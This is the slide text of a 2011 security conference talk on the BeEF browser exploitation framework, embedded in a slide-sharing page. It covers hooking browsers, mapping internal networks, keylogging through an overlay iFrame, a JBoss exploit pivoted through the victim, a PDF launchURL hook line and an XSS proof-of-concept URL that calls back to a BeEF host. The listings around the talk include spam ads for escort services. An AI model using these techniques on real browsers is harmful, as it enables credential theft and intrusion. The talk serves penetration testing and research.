Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28
 
Bug Bounty for - Beginners
Bug Bounty for - BeginnersBug Bounty for - Beginners
Bug Bounty for - Beginners
 
Bruce lawson-over-the-air
Bruce lawson-over-the-airBruce lawson-over-the-air
Bruce lawson-over-the-air
 
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27Firefox OS - The platform you deserve - Athens App Days - 2013-11-27
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 

Kürzlich hochgeladen

04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 

Kürzlich hochgeladen (20)

04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 

Hacktivity2011 be ef-preso_micheleorru

  • 1. Dr. Strangelove or: how I Learned to Stop Worrying and Love the BeEF Michele “antisnatchor” Orru’ 18 September 2011
  • 2. Who am I? ❖ Penetration Tester @ The Royal Bank of Scotland ❖ BeEF core developer: - Tunneling Proxy, - XssRays integration, - various exploits, - lot of bug-fixing, testing and fun ❖ Kubrick fan ❖ Definitely not a fan of our Italian prime minister Silvio „bunga-bunga” Berlusconi ❖@antisnatchor ❖http://antisnatchor.com
  • 3. outline: cutting, devouring and digesting the legs off a browser ❖ What the hell is BeEF? ❖Cutting - Target enumeration and analysis ❖Devouring - Internal net fingerprint - Exploiting internal services through the hooked browser - Keylogging, browser pwnage ❖Digesting - Persistence, tunneling sqlmap/Burp through BeEF proxy - XSSrays integration ❖Future development and ideas
  • 5. What the hell is BeEF? ❖ BeEF: Browser Exploitation Framework ❖Pioneered by Wade Alcorn in 2005 (public release) ❖Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse ❖Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors. ❖ The framework allows the penetration tester to select specific modules (in real- time) to target each browser, and therefore each context.
  • 6. What the hell is BeEF?
  • 7. Cutting: Target enum and analysis ❖ Lot of juicy information after first hook initialization : ❖Browser/OS version ❖Cookies ❖Browser plugins ❖Supported features (Google Gears, Web Sockets, Flash, Java, . .) ❖Specific modules are also there to help ❖Detect links/visited URLs ❖Detect social networks (authenticated in Twitter, Gmail, Facebook) and Tor ❖Execute your custom Javascript
  • 8. Cutting: Target enum and analysis
  • 9. Devouring: Internal net fingerprint ❖Recon/NetworkFingerprinting module Watch „Jboss 6.0.0M1 JMX Deploy Exploit: ❖Knowing the victim internal IP, the attacker can start to fingerprint the internal network via Javascript to find common servers and devices. (http://vimeo.com/24410203) the BeEF way... ” on Vimeo ❖The approach currently in use is similar to Yokoso (InGuardians) ❖Map of device/application default images ❖img tags are loaded into the victim DOM ❖Onload event, if (image width/height/path == deviceImageMapEntry), then deviceXYZ@IP has been successfully found
  • 10. Devouring: Internal net fingerprint ❖Great preso „Intranet Footprinting” by Javier Marcos and Juan Galiana (Owasp AppSec Eu 2011) ❖ They developed new BeEF modules ❖ They are working with us and their work will be available in BeEF trunk soon. A few examples: ❖Internal DNS enumeration ❖Reliable Port Scanning ❖Ping sweep
  • 11. Devouring: exploiting internal services ❖Network/JbossJmxUploadExploit module Watch „Jboss 6.0.0M1 JMX Deploy Exploit: ❖JBoss 4.x, 5.1.0, 6.0.0.M1 JMX deploy exploit is available in MSF, but you need to have direct access to the target (or use a host as a pivot) (http://vimeo.com/24410203) the BeEF way... ” on Vimeo ❖Then why not use the victim browser as a pivot?
  • 12. Devouring: persistent keylogging ❖Persistence/ iFrameKeylogger module ❖We can inject a 100% width/height overlay iFrame that loads the login page (in-domain), attaching a listener for keyboard events (keylogger) in JS. ❖After the victim logs in, she will stay in the injected iFrame while the communication channel will be persistent in the background.
  • 13. Devouring: module autorun ❖ We’ve ported back (from the old PHP version) the autorun feature ❖Add autorun: true in the command module config.yaml that you want to autorun ❖When a new browser will be hooked in BeEF, the module will be automatically launched ❖Imagine adding autorun: true in Metasploit autopwn module (another feature ported back)...
  • 14. Digesting: hook default browser ❖Originally disclosed by Billy (xs-sniper) Rios on „Expanding the Attack Surface” ❖Browser/HookDefault module ❖We use a PDF in order to attempt hooking the default browser ❖When executed, the hooked browser will load a PDF in a new window and use that to start the default browser. ❖app.launchURL("http://192.168.56.1/page-With-BeEF- Hook-Js.html",true); ❖If everything will be ok, we hooked the default browser. ❖Future improvements: configurable bounce page and ruby pdf library
  • 15. Digesting: tunneling proxy ❖Having a communication channel with the hooked browser, we can: ❖Receive requests as a proxy on BeEF ❖Translate these requests to XHRs (in- domain) ❖Parse the XHRs responses and send the data back to the original requestor...
  • 16. Digesting: tunneling proxy ❖Using the victim browser hooked in BeEF as a tunneling proxy, we will see the following scenarios: ❖browsing the authenticated surface of the hooked domain through the security context of the victim browser; ❖spidering the hooked domain through the security context of the victim browser; ❖finding and exploiting SQLi with Burp Pro Scanner + sqlmap (through the victim browser too :-) ).
  • 17. Digesting: tunneling proxy Let see the tunneling proxy in action! (demo time)
  • 18. Digesting: XssRays ❖ Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner ❖ The XssRays BeEF extension allows you to check if links, forms and URI paths of the page where the browser is hooked are vulnerable to XSS. ❖What XssRays do is basically parse all the links and forms of the page where it is loaded and check for XSS on GET, POST parameters, and also in the URI path.
  • 19. Digesting: XssRays ❖The original code by Gareth, from 2009, used a nice trick (the location.hash fragment) in order to have a sort of callback between parent and child iFrames ❖This is now patched by all recent browsers. So how to check for XSSs cross- domain, respecting the SOP restrictions?
  • 20. Digesting: XssRays ❖We inject a vector that will contact back BeEF if the JS code will be successfully executed (thus, the XSS confirmed). ❖No false positives (oh yes, that’s what I like)! ❖Basically the document.location.href of the injected iFrame that contains the vector will point to a know BeEF resource. The following is an example value of href: ✴http://192.168.84.1:3000/ui/xssrays/rays? hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9b Ifg41Si2eOfVpviNWYk9vi2q3kvZB&raysscanid=3&poc=http:// 192.168.84.128/dvwa/vulnerabilities/xss_r/?name=%22%3E%3Cscript %3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script %20injection%20double&method=GET
  • 32. Future dev and ideas ❖Improve XssRays: ❖add more attack vectors, more testing ❖add JS depth crawler ❖Multi-hooking: a browser can be hooked on multiple domains ❖Check for time-based blind SQLi cross- domain via JS ❖Improve the BeEF console (command line UI) ❖Well...take a look here: http:// code.google.com/p/beef/issues/list
  • 33. Get in touch with us ❖Follow the BeEF: @beefproject ❖Checkout BeEF: http://code.google.com/p/ beef/ ❖Check our website: http://beefproject.com ❖Have fun with it ❖We’re hiring!!! (but we’ll not pay you...seriously, we have so many tasks to do, join us)
  • 34. Thanks to ❖Wade Alcorn and the other BeEF ninjas: Ben, Scotty, Christian, Brendan, Saafan,. . ❖My colleagues Piotr & Michal ❖My employer ❖Hacktivity crew and you attendees